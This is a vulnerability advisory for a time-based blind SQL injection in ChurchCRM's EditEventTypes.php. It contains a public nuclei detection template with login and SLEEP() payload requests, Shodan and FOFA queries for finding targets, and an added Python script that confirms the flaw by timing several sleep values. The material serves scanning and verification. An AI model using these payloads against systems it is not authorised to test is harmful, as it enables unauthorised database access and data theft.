CVE-2025-1023: ChurchCRM - SQL Injection

Date: 2025-11-07 | Affected software: ChurchCRM | PoC: public

Vulnerability description

ChurchCRM 5.13.0 and earlier contain a time-based blind SQL injection in the EditEventTypes functionality (EditEventTypes.php). The newCountName parameter is concatenated directly into an SQL query without sanitization or parameter binding, so an attacker who can reach that page can inject arbitrary SQL statements, potentially leading to data exfiltration, modification, or deletion. Note that the PoC below authenticates first (POST /session/begin) and is tagged authenticated, so a valid ChurchCRM account is needed to reach the vulnerable endpoint, even though the CVSS vector in the template lists PR:N.

PoC code [public]

id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.00706
    epss-percentile: 0.7137
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4a0a00473045022100c9451b46191455319d11df873c6869bcf318ddf0867dd0a30212b83031864bfe022033893e0c7433da0ed6c10287374fc88daceb73085c34cc2d4ea74d0d55b238e2:922c64590222798bb761d5b6d8e72950
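As an added example, not part of the original page, the ChurchCRM project or the template author's code: a stand-alone Python checker that mirrors the template's two requests (login, then the EditEventTypes.php POST) but, instead of a single `duration_2 >= 8` threshold, times the same request with several SLEEP() values and requires the delay to scale with the requested sleep. That rules out a merely slow server, which a fixed threshold cannot. Paths, form fields and the payload shape are taken from the template above; the sleep steps, the slack value, the helper names and the `send` hook are assumptions made for this example.

```python
import http.cookiejar
import time
import urllib.error
import urllib.parse
import urllib.request

# Paths and form fields come from the template above; everything else here is
# an assumed helper written for this page, not ChurchCRM or nuclei code.
LOGIN_PATH = "/session/begin"
TARGET_PATH = "/EditEventTypes.php"
SLEEP_STEPS = (0, 3, 6)   # 0 s is the baseline; the others must each add their own delay


def build_payload(sleep_seconds: int) -> str:
    """Same shape as the template's newCountName value: close the quoted literal,
    force a MySQL SLEEP(), then rebalance the quotes so the statement still parses."""
    return f"1' AND (SELECT SLEEP({sleep_seconds})) AND '1'='1"


def build_form(sleep_seconds: int) -> dict:
    """The EditEventTypes.php form body from the template, with a variable sleep."""
    return {
        "EN_tyid": "1",
        "newEvtName": "Test",
        "newEvtStartTime": "10:30:00",
        "newCountName": build_payload(sleep_seconds),
        "Action": "ADD",
    }


def is_delayed(baseline: float, elapsed: float, sleep_seconds: int, slack: float = 1.0) -> bool:
    """True when the request took about sleep_seconds longer than the baseline request."""
    return elapsed - baseline >= sleep_seconds - slack


def timings_confirm_injection(timings: dict, slack: float = 1.0) -> bool:
    """timings maps requested sleep seconds -> observed response time in seconds.

    The 0-second entry is the baseline.  Every other entry must be delayed by
    roughly its own sleep value, so a constant delay (a slow or overloaded
    server) is not mistaken for SLEEP() executing, unlike a single fixed
    threshold such as `duration_2 >= 8`."""
    baseline = timings[0]
    steps = [s for s in timings if s > 0]
    if len(steps) < 2:
        return False
    return all(is_delayed(baseline, timings[s], s, slack) for s in steps)


def timed_post(opener, url: str, form: dict) -> float:
    """POST the form and return the wall-clock time until the response (or error) arrives."""
    data = urllib.parse.urlencode(form).encode()
    start = time.monotonic()
    try:
        with opener.open(url, data=data, timeout=60):
            pass
    except urllib.error.HTTPError:
        pass   # the template itself expects a 500 here; only the timing matters
    return time.monotonic() - start


def check_target(base_url: str, username: str, password: str, send=None) -> bool:
    """Log in (EditEventTypes.php sits behind the session), then time one request
    per SLEEP_STEPS value.  `send(form) -> seconds` may be supplied for testing."""
    if send is None:
        jar = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
        login = urllib.parse.urlencode({"User": username, "Password": password}).encode()
        opener.open(base_url + LOGIN_PATH, data=login, timeout=60)

        def send(form):
            return timed_post(opener, base_url + TARGET_PATH, form)

    timings = {s: send(build_form(s)) for s in SLEEP_STEPS}
    return timings_confirm_injection(timings)


if __name__ == "__main__":
    import sys
    # usage: python check.py https://crm.example.test admin 'secret'   (assumed target)
    base, user, pw = sys.argv[1:4]
    print("time-based SQLi confirmed" if check_target(base, user, pw) else "no scaling delay observed")
```

Only run this against an instance you are authorised to test: each positive run holds a database connection for the requested SLEEP() time. The `send` hook exists so the decision logic can be exercised offline with recorded timings, which is also how you would tune `slack` for a noisy network before trusting a result.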
